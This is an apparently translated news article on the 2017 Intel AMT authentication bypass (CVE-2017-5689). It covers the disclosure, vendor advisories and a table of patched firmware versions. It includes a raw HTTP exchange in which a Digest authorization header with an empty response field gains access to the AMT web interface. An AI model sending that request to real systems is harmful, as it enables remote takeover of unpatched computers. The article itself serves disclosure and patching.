Vulnerability in Intel AMT turned out to be more serious than they thought.

On May 1, 2017, Intel announced a critical vulnerability in Active Management Technology (AMT) (INTEL-SA-00075, aka CVE-2017-5689 ). Vulnerability found Maxim Malyutin from the company Embedi, but kept it secret at the request of Intel before the official announcement.

Intel AMT is a hardware technology that provides remote and out-of-band (via an independent auxiliary TCP / IP channel) access to manage settings and security of a computer regardless of the power state (remote on / off of the computer) and OS status. The technology is integrated into the chipset. If you use it as an anti-rootkit for scanning the RAM and PC drives, then there are no ways to bypass such protection. Worse, remote queries to the AMT are not logged in the system log.

Now a query to Shodan issues more than 8500 systems with open ports AMT. For some BIOS firmwares, patches that fix the bug in AMT have not yet been released.
')
The AMT technology allows system administrators to remotely perform various actions on the system: turn on off computers, change bootloader code, control input devices, executable programs, etc. In fact, AMT allows you to perform all actions that you can perform remotely. having physical access to the PC.

After reading the description of the technology, you can begin to fantasize what possibilities the hacker has, having remote access to an off computer with the AMT technology. So, your fantasies were true . Remote access to AMT is provided via the web interface in the browser. As Maxim found out, any cryptographic hash is suitable for digest access authentication, or none at all. That is, the corresponding field in the authorization form can be left empty.

It doesn't even look like a backdoor, because who will implement it in such a clumsy way?

Vulnerable systems after 2010-2011 release (a list of vulnerable firmware, see below). This is 100% not RCE, but rather a logical vulnerability. Maxim Malyutin believes that there are several attack vectors, as an attacker could use this vulnerability, perhaps even on Intel systems without Intel AMT support.

“Authentication is still working, ” Malyutin explained . “We just found a way around it.”

Through a web browser, you can get full access to the AMT functions, as if you recognize the admin password in the system. Here is how this is done using the local proxy at 127.0.0.1:16992:

GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth" Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c" HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 

A few days after the information was disclosed, Tenact released an exploit to exploit a critical vulnerability with an increase in AMT privileges. The company offered to use this tool to detect vulnerable systems in its network. That system administrators knew where to install new firmware versions. The exploit is implemented as a Nessus plugin .

On the same days, the largest security server and personal computer manufacturers released official security messages for their customers: a message from HP , from Dell , from Lenovo , from Fujitsu . There will be detailed information about vulnerable firmware and links to updated versions will appear as soon as they become available.

List of patched firmware from Intel

Vulnerable versions firmware	Corresponding CPU generation	Patched firmware
6.0.xx.xxxx	1 st Gen Core	6.2.61.3535
6.1.xx.xxxx		6.2.61.3535
6.2.xx.xxxx		6.2.61.3535
7.0.xx.xxxx	2 nd Gen Core	7.1.91.3272
7.1.xx.xxxx		7.1.91.3272
8.0.xx.xxxx	3 rd Gen Core	8.1.71.3608
8.1.xx.xxxx		8.1.71.3608
9.0.xx.xxxx	4 th Gen Core	9.1.41.3024
9.1.xx.xxxx		9.1.41.3024
9.5.xx.xxxx		9.5.61.3012
10.0.xx.xxxx	5 th Gen Core	10.0.55.3000
11.0.xx.xxxx	6 th Gen Core	11.0.25.3001 11.0.22.3001 11.0.18.3003
11.5.xx.xxxx	7 th Gen Core	11.6.27.3264
11.6.xx.xxxx		11.6.27.3264 11.6.12.3202

Intel has released the official tool to check the system for vulnerabilities under Windows 7/10, as well as a guide for its use.